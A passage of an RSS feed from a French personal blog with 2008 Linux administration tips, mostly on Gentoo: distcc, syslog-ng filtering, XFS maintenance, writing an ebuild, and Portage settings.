svn co http://svn.enlightenment.org/svn/e/trunk/e_dbus
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Pour entrance:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;svn co http://svn.enlightenment.org/svn/e/trunk/esmart
svn co http://svn.enlightenment.org/svn/e/trunk/entrance
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Pour la compilation des libs c’est toujours pareil :&lt;br&gt;
&lt;code&gt;./autogen.sh &amp;amp;&amp;amp; make &amp;amp;&amp;amp; make install (en root)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;L’ordre de compilation est bien sur important 🙂&lt;br&gt;
Comme d’habitude le path d’installation par defaut est &lt;em&gt;/usr/local/&lt;/em&gt;, si vous voulez l’installer ailleurs il faudra le specifier à autogen.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>sys-libs/ss (is blocking sys-libs/e2fsprogs-libs-1.41.2)</title>
      <link>https://www.lamy.im/posts/sys-libsss-is-blocking-sys-libse2fsprogs-libs-1412/</link>
      <pubDate>Wed, 29 Oct 2008 01:06:51 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/sys-libsss-is-blocking-sys-libse2fsprogs-libs-1412/</guid>
      <description>Enfer et damnation !
Calculating world dependencies... done! [ebuild U ] sys-fs/e2fsprogs-1.41.2 [1.40.9] USE=&amp;#34;nls (-static%)&amp;#34; 4,263 kB [ebuild N ] sys-libs/e2fsprogs-libs-1.41.2 USE=&amp;#34;nls&amp;#34; 479 kB [blocks B ] sys-libs/ss (is blocking sys-libs/e2fsprogs-libs-1.41.2) [blocks B ] &amp;lt;sys-fs/e2fsprogs-1.41 (is blocking sys-libs/e2fsprogs-libs-1.41.2) [blocks B ] sys-libs/com_err (is blocking sys-libs/e2fsprogs-libs-1.41.2) [blocks B ] sys-libs/e2fsprogs-libs (is blocking sys-libs/ss-1.40.9, sys-libs/com_err-1.40.9) Portage a décidé de me faire mon vilain! Mieux vaut ne pas unmerger à la sauvage ces libs vitales pour le systeme.</description>
      <content>&lt;p&gt;Enfer et damnation !&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;Calculating world dependencies... done!
[ebuild     U ] sys-fs/e2fsprogs-1.41.2 [1.40.9] USE=&amp;#34;nls (-static%)&amp;#34; 4,263 kB
[ebuild  N    ] sys-libs/e2fsprogs-libs-1.41.2  USE=&amp;#34;nls&amp;#34; 479 kB
[blocks B     ] sys-libs/ss (is blocking sys-libs/e2fsprogs-libs-1.41.2)
[blocks B     ] &amp;lt;sys-fs/e2fsprogs-1.41 (is blocking sys-libs/e2fsprogs-libs-1.41.2)
[blocks B     ] sys-libs/com_err (is blocking sys-libs/e2fsprogs-libs-1.41.2)
[blocks B     ] sys-libs/e2fsprogs-libs (is blocking sys-libs/ss-1.40.9, sys-libs/com_err-1.40.9)
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Portage a décidé de me faire mon vilain!
Mieux vaut ne pas unmerger à la sauvage ces libs vitales pour le systeme.&lt;/p&gt;
&lt;p&gt;Dès lors, deux solutions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;contournement brutal voire commentaire 7 sur le &lt;a href=&#34;http://bugs.gentoo.org/show_bug.cgi?id=234907#c7&#34;&gt;bug ouvert chez gentoo&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;attendre que la version 2.1.5 passe en stable dans le portage tree&lt;/li&gt;
&lt;/ul&gt;
</content>
    </item>
    
    <item>
      <title>Distcc sur gentoo</title>
      <link>https://www.lamy.im/posts/distcc-sur-gentoo/</link>
      <pubDate>Sat, 18 Oct 2008 02:22:35 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/distcc-sur-gentoo/</guid>
      <description>Introduction Distcc est très pratique voire indispensable sur des systèmes comme Gentoo où le temps passer à compiler peut être important. Distcc permet de faire de la compilation distribuée, c’est a dire que nous allons répartir les taches de compilations sur plusieurs machines afin d&amp;rsquo;en partager la peine 🙂
Prérequis Pour que Distcc fonctionne bien nous aurons besoin des memes versions de GCC partout.
Distcc est capable de faire de la crosscompilation mais on ne traitera pas ça ici.</description>
      <content>&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Distcc est très pratique voire indispensable sur des systèmes comme Gentoo où le temps passer à compiler peut être important. Distcc permet de faire de la compilation distribuée, c’est a dire que nous allons répartir les taches de compilations sur plusieurs machines afin d&amp;rsquo;en partager la peine 🙂&lt;/p&gt;
&lt;h2 id=&#34;prérequis&#34;&gt;Prérequis&lt;/h2&gt;
&lt;p&gt;Pour que Distcc fonctionne bien nous aurons besoin des memes versions de GCC partout.&lt;br&gt;
Distcc est capable de faire de la crosscompilation mais on ne traitera pas ça ici. Je suis sur x86 uniquement.&lt;/p&gt;
&lt;h2 id=&#34;installation-et-configuration&#34;&gt;Installation et configuration&lt;/h2&gt;
&lt;p&gt;Pour le monitoring on utilisera le USE &lt;em&gt;gtk&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;emerge -av distcc&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Si les machines utilisant distcc sont 10.0.0.1 et 10.0.0.2 La configuration suivante s’applique sur la machine 10.0.0.1 dans /etc/distcc/hosts&lt;/p&gt;
&lt;p&gt;&lt;code&gt;10.0.0.2 localhost&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;On fera l’inverse sur l’autre machine&lt;/p&gt;
&lt;p&gt;Dans le make.conf il faut dire à portage d’utiliser distcc:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;DISTCC_HOSTS=&amp;#34;10.0.0.2 localhost&amp;#34;
# on indique d&amp;#39;utiliser distcc, ici nous utilisons deja ccache donc on le met avant, c&amp;#39;est important
FEATURES=&amp;#34;ccache distcc&amp;#34;`

Ne pas oublier de mettre à jour le l’option -j pour GCC sur le paramètre MAKEOPTS.

On lance le service maintenant et pour les prochains boot.

`/etc/init.d/distcc start &amp;amp;&amp;amp; rc-update add distcc default`

Voila c’est fini o/  
Pour avoir un gain de temps vraiment réel il faut aussi utiliser ccache.
&lt;/code&gt;&lt;/pre&gt;</content>
    </item>
    
    <item>
      <title>syslog-ng, gentoo hardened et cron :)</title>
      <link>https://www.lamy.im/posts/syslog-ng-gentoo-hardened-et-cron/</link>
      <pubDate>Mon, 06 Oct 2008 21:51:13 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/syslog-ng-gentoo-hardened-et-cron/</guid>
      <description>Je me suis retrouvé sur Gentoo hardened avec quelque chose d’un peu gênant… les logs de vixie-cron dans le /var/log/message, le /var/log/debug et le /var/log/cron.log. Sympa, mais un poil redondant. Cela ne concerne que Gentoo hardened qui dispose d’un fichier de conf spécifique pour syslog-ng.
Pour que cron logue seulement dans son ficher, il suffit d’exclure les logs cron des fichiers debug et message:
filter f_messages { level(info..warn) and not facility(auth, authpriv, mail, news, cron); }; destination messages { file(« /var/log/messages »); }; log { source(src); filter(f\_messages); destination(messages); }; Même punition pour le fichier de debug and voila.</description>
      <content>&lt;p&gt;Je me suis retrouvé sur Gentoo hardened avec quelque chose d’un peu gênant… les logs de vixie-cron dans le /var/log/message, le /var/log/debug et le /var/log/cron.log. Sympa, mais un poil redondant. Cela ne concerne que Gentoo hardened qui dispose d’un fichier de conf spécifique pour syslog-ng.&lt;/p&gt;
&lt;p&gt;Pour que cron logue seulement dans son ficher, il suffit d’exclure les logs cron des fichiers debug et message:&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;filter f_messages { level(info..warn)
and not facility(auth, authpriv, mail, news, cron); };
destination messages { file(« /var/log/messages »); };
log { source(src); filter(f\_messages); destination(messages); };
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Même punition pour le fichier de debug and voila.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>XFS mon amour :)</title>
      <link>https://www.lamy.im/posts/xfs-mon-amour/</link>
      <pubDate>Fri, 12 Sep 2008 09:05:37 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/xfs-mon-amour/</guid>
      <description>Ci dessous, un bloc note sur l’utilisation de XFS.
Vérification du Filesystem Pour verifier la consistence du Systeme de fichier, on utilise conjointement deux programmes xfs_check et xfs_repair.
xfs_check /dev/device xfs_repair -n /dev/device xfs_repair -n fait un test un peu plus complet que xfs_check
Réparation du Filesystem Pour réparer des inconsitences du FS on pourra utiliser xfs_repair et ceci toujours sur un device démonté 🙂
xfs_repair /dev/device
Fragmentation Au bout de quelques années d’utilisation il se peut qu’un système de fichiers se fragmente un peu, surtout si la partition est presque pleine et qu’il y a des mouvements de fichiers réguliers.</description>
      <content>&lt;p&gt;Ci dessous, un bloc note sur l’utilisation de XFS.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Vérification du Filesystem&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pour verifier la consistence du Systeme de fichier, on utilise conjointement deux programmes &lt;em&gt;xfs_check&lt;/em&gt; et &lt;em&gt;xfs_repair&lt;/em&gt;.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;xfs_check /dev/device
xfs_repair -n /dev/device
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;&lt;em&gt;xfs_repair -n&lt;/em&gt; fait un test un peu plus complet que &lt;em&gt;xfs_check&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Réparation du Filesystem&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pour réparer des inconsitences du FS on pourra utiliser &lt;em&gt;xfs_repair&lt;/em&gt; et ceci toujours sur un device démonté 🙂&lt;br&gt;
&lt;code&gt;xfs_repair /dev/device&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Fragmentation&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Au bout de quelques années d’utilisation il se peut qu’un système de fichiers se fragmente un peu, surtout si la partition est presque pleine et qu’il y a des mouvements de fichiers réguliers.&lt;/p&gt;
&lt;p&gt;XFS intègre des outils pour défragmenter ses partitions à chaud.&lt;br&gt;
Cet outil magique se trouve dans le package &lt;em&gt;xfsdump&lt;/em&gt; dans lequel on trouvera aussi les outils de backup et restore.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;emerge -av xfsdump&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Nous allons ensuite verifier le taux de fractionnement de notre partition.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;xfs_db -r /dev/hda1
xfs_db&amp;gt; frag
actual 452654, ideal 450929, fragmentation factor 0.38%
xfs_db&amp;gt;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Visiblement L’utilisation de Gentoo en ~x86 sur mon portable pendant plusieurs années n’a pas fait suffisament souffir XFS 🙂&lt;/p&gt;
&lt;p&gt;Dans le cas ou nous aurions besoin de défragmenter on pourra utiliser la commande suivante:&lt;br&gt;
&lt;code&gt;xfs_fsr -v /dev/hda1&lt;/code&gt;&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Packaging Gentoo</title>
      <link>https://www.lamy.im/posts/packaging-gentoo/</link>
      <pubDate>Sat, 30 Aug 2008 00:46:36 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/packaging-gentoo/</guid>
      <description>Packaging Gentoo Portage et le système d’ebuild de Gentoo sont des outils très puissants et flexibles, mais un peu obscur à utiliser au départ pour qui veut faire son package. Voyons comment s’y prendre.
Première étape, il faut définir un overlay si ce n’est déjà fait. Pour rappel, l’overlay consiste en un dossier parallèle au dossier /usr/portage qui constitue en fait une extension de la base de données des paquets. Il est alors possible de rajouter ses propres paquets dans cet overlay, pour notamment y mettre des ebuilds de version de test ou tout simplement de logiciel non encore présent dans Portage.</description>
      <content>&lt;h1 id=&#34;packaging-gentoo&#34;&gt;Packaging Gentoo&lt;/h1&gt;
&lt;p&gt;Portage et le système d’ebuild de Gentoo sont des outils très puissants et flexibles, mais un peu obscur à utiliser au départ pour qui veut faire son package. Voyons comment s’y prendre.&lt;br&gt;
Première étape, il faut définir un overlay si ce n’est déjà fait. Pour rappel, l’overlay consiste en un dossier parallèle au dossier /usr/portage qui constitue en fait une extension de la base de données des paquets. Il est alors possible de rajouter ses propres paquets dans cet overlay, pour notamment y mettre des ebuilds de version de test ou tout simplement de logiciel non encore présent dans Portage.&lt;/p&gt;
&lt;h2 id=&#34;création-de-loverlay&#34;&gt;Création de l’overlay&lt;/h2&gt;
&lt;p&gt;Rien de plus simple :&lt;/p&gt;
&lt;p&gt;On créé un répertoire pour stocker l’overlay.&lt;br&gt;
&lt;code&gt;mkdir /usr/local/portage&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Ensuite il suffit d’éditer le fichier /etc/make.conf et d’y ajouter cette ligne.&lt;br&gt;
&lt;code&gt;PORTDIR_OVERLAY=&amp;quot;/usr/local/portage&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Voila, l’overlay est défini.&lt;/p&gt;
&lt;h2 id=&#34;création-dun-ebuild&#34;&gt;Création d’un ebuild&lt;/h2&gt;
&lt;p&gt;Avant toute chose, il faut savoir que votre ebuild doit avoir un nom précis, et être dans un dossier précis (on rapelle que l’overlay doit avoir la même structure que Portage).&lt;br&gt;
Votre ebuild doit donc être dans un de ces dossiers (que vous créerez dans le dossier de l’overlay pour l’occasion si ce n’est déjà fait) :&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;app-accessibility  
app-admin  
app-antivirus  
app-arch  
app-backup  
app-benchmarks  
app-cdr  
app-crypt  
app-dicts  
app-doc  
app-editors  
app-emacs  
app-emulation  
app-forensics  
app-i18n  
app-laptop  
app-misc  
app-mobilephone  
app-office  
app-pda  
app-portage  
app-shells  
app-text  
app-vim  
app-xemacs  
dev-ada  
dev-cpp  
dev-db  
dev-dotnet  
dev-embedded  
dev-games  
dev-haskell  
dev-java  
dev-lang  
dev-libs  
dev-lisp  
dev-ml  
dev-perl  
dev-php  
dev-php4  
dev-php5  
dev-python  
dev-ruby  
dev-scheme  
dev-tcltk  
dev-tex  
dev-tinyos  
dev-util  
games-action  
games-arcade  
games-board  
games-emulation  
games-engines  
games-fps  
games-kids  
games-misc  
games-mud  
games-puzzle  
games-roguelike  
games-rpg  
games-server  
games-simulation  
games-sports  
games-strategy  
games-util  
gnome-base  
gnome-extra  
gnustep-apps  
gnustep-base  
gnustep-libs  
kde-base  
kde-misc  
mail-client  
mail-filter  
mail-mta  
media-fonts  
media-gfx  
media-libs  
media-plugins  
media-radio  
media-sound  
media-tv  
media-video  
net-analyzer  
net-dialup  
net-dns  
net-firewall  
net-fs  
net-ftp  
net-im  
net-irc  
net-libs  
net-mail  
net-misc  
net-nds  
net-news  
net-nntp  
net-p2p  
net-print  
net-proxy  
net-wireless  
net-www  
net-zope  
perl-core  
rox-base  
rox-extra  
sci-astronomy  
sci-biology  
sci-calculators  
sci-chemistry  
sci-electronics  
sci-geosciences  
sci-libs  
sci-mathematics  
sci-misc  
sci-visualization  
sys-apps  
sys-auth  
sys-block  
sys-boot  
sys-cluster  
sys-devel  
sys-fs  
sys-kernel  
sys-libs  
sys-power  
sys-process  
www-apache  
www-apps  
www-client  
www-misc  
www-servers  
x11-apps  
x11-base  
x11-drivers  
x11-libs  
x11-misc  
x11-plugins  
x11-proto  
x11-terms  
x11-themes  
x11-wm  
xfce-base  
xfce-extra
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;L’ebuild basique : il télécharge, décompresse, configure, compile et installe une archive de source.&lt;br&gt;
L’ebuild est nommé de la manière suivante : nom_du_soft-version.ebuild et est stocké dans &lt;em&gt;/usr/local/portage/dossier-correspondant-au-type-de-l’application&lt;/em&gt; (voir juste au dessus)/nom_du_soft/&lt;/p&gt;
&lt;p&gt;N’oubliez pas de créer aussi le répertoire &lt;em&gt;/usr/local/portage/app-portage/clean-distfiles/files&lt;/em&gt; qui sert à stocker tous les digest&lt;/p&gt;
&lt;p&gt;Décortiquons l’ebuild d’aMule 2.1.0 par exemple. Il s’appelle logiquement amule-2.1.0-r1.ebuild.&lt;br&gt;
L’entête standard&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;# Copyright 1999-2006 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
# $Header: /var/cvsroot/gentoo-x86/net-p2p/amule/amule-2.1.0-r1.ebuild,v 1.1 2006/01/13 11:18:44 mkay Exp $
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;L’ebuild va utiliser des fonctions des ces classes&lt;br&gt;
&lt;code&gt;inherit eutils flag-o-matic wxwidgets&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Définition de quelques variables par praticité. Emerge définit un certains nombre de variables lui même, comme par exemple ${PV} qui donne directement la version du paquets selon le nom de l’ebuild. Pratique pour mettre à jour un paquet juste en renommant l’ebuild.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;MY_P=${P/m/M}
S=${WORKDIR}/${MY_P}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Le description du paquet.&lt;br&gt;
&lt;code&gt;DESCRIPTION=&amp;quot;aMule, the all-platform eMule p2p client&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;La homepage du paquet.&lt;br&gt;
&lt;code&gt;HOMEPAGE=&amp;quot;http://www.amule.org/&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;L’url de téléchargement. On remarque l’utilisation de variable, ce qui rend l’ebuild plus « dynamique ».&lt;br&gt;
&lt;code&gt;SRC_URI=&amp;quot;mirror://sourceforge/${PN}/${MY_P}.tar.bz2&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;La licence du soft.&lt;br&gt;
&lt;code&gt;LICENSE=&amp;quot;GPL-2&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Le slot d’installation. Cela permet d’installer parallèlement plusieurs versions du même paquets (surtout utiliser pour certaines librairies, ou pour les kernel).&lt;br&gt;
&lt;code&gt;SLOT=&amp;quot;0&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Les keywords du paquets.&lt;br&gt;
&lt;code&gt;KEYWORDS=&amp;quot;~alpha ~amd64 ~ppc ~ppc64 ~sparc ~x86&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Définit les flags USE auquels l’ebuild peut réagir.&lt;br&gt;
&lt;code&gt;IUSE=&amp;quot;amuled debug gtk nls remote stats unicode&amp;quot;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Définition des dépendances du paquets.&lt;/p&gt;
&lt;p&gt;aMule dépend donc de wxGTK, de zlib et ce, inconditionnellement. Par contre, il dépend de gd si le flag USE « stats » est utilisé. De même pour libpng avec le flag USE « remote ». Pour finir, aMule ne peut pas être installé en même temps que xmule (provoquera une erreur « ebuild blocked by another ».&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;DEPEND=&amp;#34;&amp;gt;=x11-libs/wxGTK-2.6.0
&amp;gt;=sys-libs/zlib-1.2.1
stats? ( &amp;gt;=media-libs/gd-2.0.26 )
remote? ( &amp;gt;=media-libs/libpng-1.2.0 )
!net-p2p/xmule&amp;#34;
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;L’étape de configuration. Elle est utilisée pour vérifier que les paramètres ne comporte pas d’erreur. La fonction « use » est utilisé pour savoir un flag USE est défini ou non.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;pkg_setup() {
		export WX_GTK_VER=&amp;#34;2.6&amp;#34;

		if ! use gtk &amp;amp;&amp;amp; ! use remote &amp;amp;&amp;amp; ! use amuled; then
				eerror &amp;#34;&amp;#34;
				eerror &amp;#34;You have to specify at least one of gtk, remote or amuled&amp;#34;
				eerror &amp;#34;USE flag to build amule.&amp;#34;
				eerror &amp;#34;&amp;#34;
				die &amp;#34;Invalid USE flag set&amp;#34;
		fi

		if use unicode &amp;amp;&amp;amp; use gtk; then
				einfo &amp;#34;wxGTK with gtk2 and unicode support will be used&amp;#34;
				need-wxwidgets unicode
		elif use gtk; then
				einfo &amp;#34;wxGTK with gtk2 support will be used&amp;#34;
				need-wxwidgets gtk2
		elif use unicode; then
				einfo &amp;#34;wxGTK with unicode and without X support will be used&amp;#34;
				need-wxwidgets base-unicode
		else
				einfo &amp;#34;wxGTK without X support will be used&amp;#34;
				need-wxwidgets base
		fi

		if use stats &amp;amp;&amp;amp; ! use gtk; then
				einfo &amp;#34;Note: You would need both the gtk and stats USE flags&amp;#34;
				einfo &amp;#34;to compile aMule Statistics GUI.&amp;#34;
				einfo &amp;#34;I will now compile console versions only.&amp;#34;
		fi

		if use stats &amp;amp;&amp;amp; ! built_with_use media-libs/gd jpeg; then
				die &amp;#34;media-libs/gd should be compiled with the jpeg use flag when you have the stats use flag set&amp;#34;
		fi
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;L’étape de configuration/compilation. De même que pour pkg_setup, on utilise la fonction « use » pour configurer dynamiquement les sources. Classiquement, on définit une variable locale (ici myconf) à laquelle on rajoute des arguments selon les flags USE utilisés. Pour configurer le paquet, on n’utilise pas directement ./configure, mais plutôt la fonction &lt;em&gt;econf&lt;/em&gt; et pour compiler non pas make mais &lt;em&gt;emake&lt;/em&gt;.&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;src_compile() {
		local myconf=&amp;#34;&amp;#34;

		if use gtk ; then
				use stats &amp;amp;&amp;amp; myconf=&amp;#34;${myconf}
					--enable-wxcas
					--enable-alc&amp;#34;
				use remote &amp;amp;&amp;amp; myconf=&amp;#34;${myconf}
					--enable-amule-gui&amp;#34;
		else
				myconf=&amp;#34;
					--disable-monolithic
					--disable-amule-gui
					--disable-wxcas
					--disable-alc&amp;#34;
		fi

		econf 
				--with-wx-config=${WX_CONFIG} 
				--with-wxbase-config=${WX_CONFIG} 
				--enable-amulecmd 
				`use_enable debug` 
				`use_enable !debug optimize` 
				`use_enable amuled amule-daemon` 
				`use_enable nls` 
				`use_enable remote webserver` 
				`use_enable stats cas` 
				`use_enable stats alcc` 
				${myconf} || die

		# we filter ssp until bug #74457 is closed to build on hardened
		if has_hardened; then
				filter-flags -fstack-protector -fstack-protector-all
		fi
 		emake -j1 || die
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;L’étape d’installation des sources, utilisée notamment si des manipulations sont à faire après la compilation (ici par exemple, la création de nouveaux groupes ou d’utilisateurs).&lt;/p&gt;
&lt;pre tabindex=&#34;0&#34;&gt;&lt;code&gt;src_install() {
 		make DESTDIR=${D} install || die

		if use amuled || use remote; then
			if ! id p2p &amp;gt;/dev/null; then
					enewgroup p2p
					enewuser p2p -1 -1 /home/p2p p2p
			fi
		fi

		if use amuled; then
				insinto /etc/conf.d; newins ${FILESDIR}/amuled.confd amuled
				exeinto /etc/init.d; newexe ${FILESDIR}/amuled.initd amuled
		fi

		if use remote; then
				insinto /etc/conf.d; newins ${FILESDIR}/amuleweb.confd amuleweb
				exeinto /etc/init.d; newexe ${FILESDIR}/amuleweb.initd amuleweb
		fi
}
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Comme on a pu le voir, certaines fonctions sont à la dispositions de l’utilisateur dans les ebuilds. Les plus courantes :&lt;/p&gt;
&lt;p&gt;– use : permet de vérifier la présence d’un flag USE.&lt;br&gt;
– einfo : affiche un message d’information.&lt;br&gt;
– eerror : affiche un message d’erreur et stoppe.&lt;br&gt;
– econf : configure les sources.&lt;br&gt;
– emake : compile les sources.&lt;/p&gt;
&lt;p&gt;Une fois l’ebuild créé, il doit être placé dans le bon répertoire. Ensuite, il faut créer le digest : &lt;em&gt;ebuild chemin_vers_l’ebuild digest&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Une fois ceci fait sans erreur, votre paquet est près à être emergé.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Plus d’infos ?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Pour avoir plus d’informations sur la création d’ebuilds Gentoo, vous pouvez allez directement consulter la page de référence du &lt;a href=&#34;http://www.gentoo.org/proj/fr/devrel/handbook/handbook.xml?part=2&amp;amp;chap=1&#34; title=&#34;handbook gentoo&#34;&gt;handbook gentoo&lt;/a&gt;. Vous y retrouverez tout ce qui a été dit ici, mais aussi la liste complète des variables et des fonctions définies par emerge.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>emerge -sync, ne pas regénérer le cache</title>
      <link>https://www.lamy.im/posts/emerge-sync-ne-pas-regenerer-le-cache/</link>
      <pubDate>Sun, 24 Aug 2008 23:54:45 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/emerge-sync-ne-pas-regenerer-le-cache/</guid>
      <description>Un autre tip tiré de (bientôt) feu le wiki, merci trap :-)
On le sait, Portage est très bien mais le souci reste quand même la lenteur relative de emerge –sync. Une astuce pour gagner un peu de temps consiste à désactiver la régénération du cache à la fin du processus.
Marche à suivre:
Elle est très simple. Tout d’abord :
echo &amp;quot;portdbapi.auxdbmodule = cache.metadata_overlay.database&amp;quot; &amp;gt;&amp;gt; /etc/portage/modules
Rajouter ensuite FEATURES=&amp;quot;-metadata-transfer dans le fichier /etc/make.</description>
      <content>&lt;p&gt;Un autre tip tiré de (bientôt) feu le wiki, merci trap :-)&lt;/p&gt;
&lt;p&gt;On le sait, Portage est très bien mais le souci reste quand même la lenteur relative de &lt;em&gt;emerge –sync&lt;/em&gt;. Une astuce pour gagner un peu de temps consiste à désactiver la régénération du cache à la fin du processus.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Marche à suivre:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Elle est très simple. Tout d’abord :&lt;/p&gt;
&lt;p&gt;&lt;code&gt;echo &amp;quot;portdbapi.auxdbmodule = cache.metadata_overlay.database&amp;quot; &amp;gt;&amp;gt; /etc/portage/modules&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Rajouter ensuite &lt;code&gt;FEATURES=&amp;quot;-metadata-transfer&lt;/code&gt; dans le fichier &lt;em&gt;/etc/make.conf&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;Et pour finir, on peut supprimer l’ancien cache :&lt;br&gt;
&lt;code&gt;rm -rf /var/cache/edb/dep/*&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conclusion :&lt;/strong&gt;&lt;br&gt;
Voilà 5 minutes (voire plus) de gagnées pour la mise à jour. Alors la grande question reste pourquoi cela n’est pas le comportement par défaut de Portage ?&lt;br&gt;
Portage n’est pas encore capable de détecter si un eclass a été modifié entre temps et donc s’il faut régénerer le cache ou pas. Si vous ne faites aucune modification d’eclass (ce qui est assez probablement le cas), cette méthode ne pose aucun souci.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Nouvelles options de portage</title>
      <link>https://www.lamy.im/posts/nouvelles-options-de-portage/</link>
      <pubDate>Sun, 17 Aug 2008 00:10:05 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/nouvelles-options-de-portage/</guid>
      <description>Depuis portage-2.2_rc2, de nouvelles fonctions ont été intégrées.
–jobs JOBS
Specifies the number of packages to build simultaneously.
Also see the related –load-average option.
–keep-going
Continue as much as possible after an error. When an error
occurs, dependencies are recalculated for remaining packages
and any with unsatisfied dependencies are automatically
dropped. Also see the related –skipfirst option.
–load-average LOAD
Specifies that no new builds should be started if there are</description>
      <content>&lt;p&gt;Depuis portage-2.2_rc2, de nouvelles fonctions ont été intégrées.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;–jobs JOBS&lt;br&gt;
Specifies the number of packages to build simultaneously.&lt;br&gt;
Also see the related –load-average option.&lt;/p&gt;
&lt;p&gt;–keep-going&lt;br&gt;
Continue as much as possible after an error. When an error&lt;br&gt;
occurs, dependencies are recalculated for remaining packages&lt;br&gt;
and any with unsatisfied dependencies are automatically&lt;br&gt;
dropped. Also see the related –skipfirst option.&lt;/p&gt;
&lt;p&gt;–load-average LOAD&lt;br&gt;
Specifies that no new builds should be started if there are&lt;br&gt;
other builds running and the load average is at least LOAD (a&lt;br&gt;
floating-point number). This option is recommended for use in&lt;br&gt;
combination with –jobs in order to avoid excess load. See&lt;br&gt;
make(1) for information about analogous options that should&lt;br&gt;
be configured via MAKEOPTS in make.conf(5).&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Ces options permettent de paralleliser les opérations et ainsi de tirer de parti des processeurs multi core. Les versions de portage intégrants ces fonctions ne sont disponibles qu’en ~arch pour le moment.&lt;/p&gt;
</content>
    </item>
    
    <item>
      <title>Debian testing hybride avec unstable</title>
      <link>https://www.lamy.im/posts/debian-testing-hybride-unstable/</link>
      <pubDate>Sat, 16 Aug 2008 02:48:24 +0000</pubDate>
      
      <guid>https://www.lamy.im/posts/debian-testing-hybride-unstable/</guid>
      <description>Encore un tip qui vient du wiki. Merci Superna 🙂
Introduction Il arrive que la debian testing soit en manque ce certains paquets qui sont disponibles en unstable.
Il faut alors mettre sa debian en Hybride, en ajoutant le repository unstable et régler apt pour donner une plus grande priorité a Testing.
Ajout de Unstable Ajoutez dans votre /etc/apt/sources.list les lignes correspondant à unstable.
Par exemple vous pouvez avoir :</description>
      <content>&lt;p&gt;&lt;em&gt;Encore un tip qui vient du wiki. Merci Superna 🙂&lt;/em&gt;&lt;/p&gt;
&lt;h2 id=&#34;introduction&#34;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;Il arrive que la debian testing soit en manque ce certains paquets qui sont disponibles en unstable.&lt;br&gt;
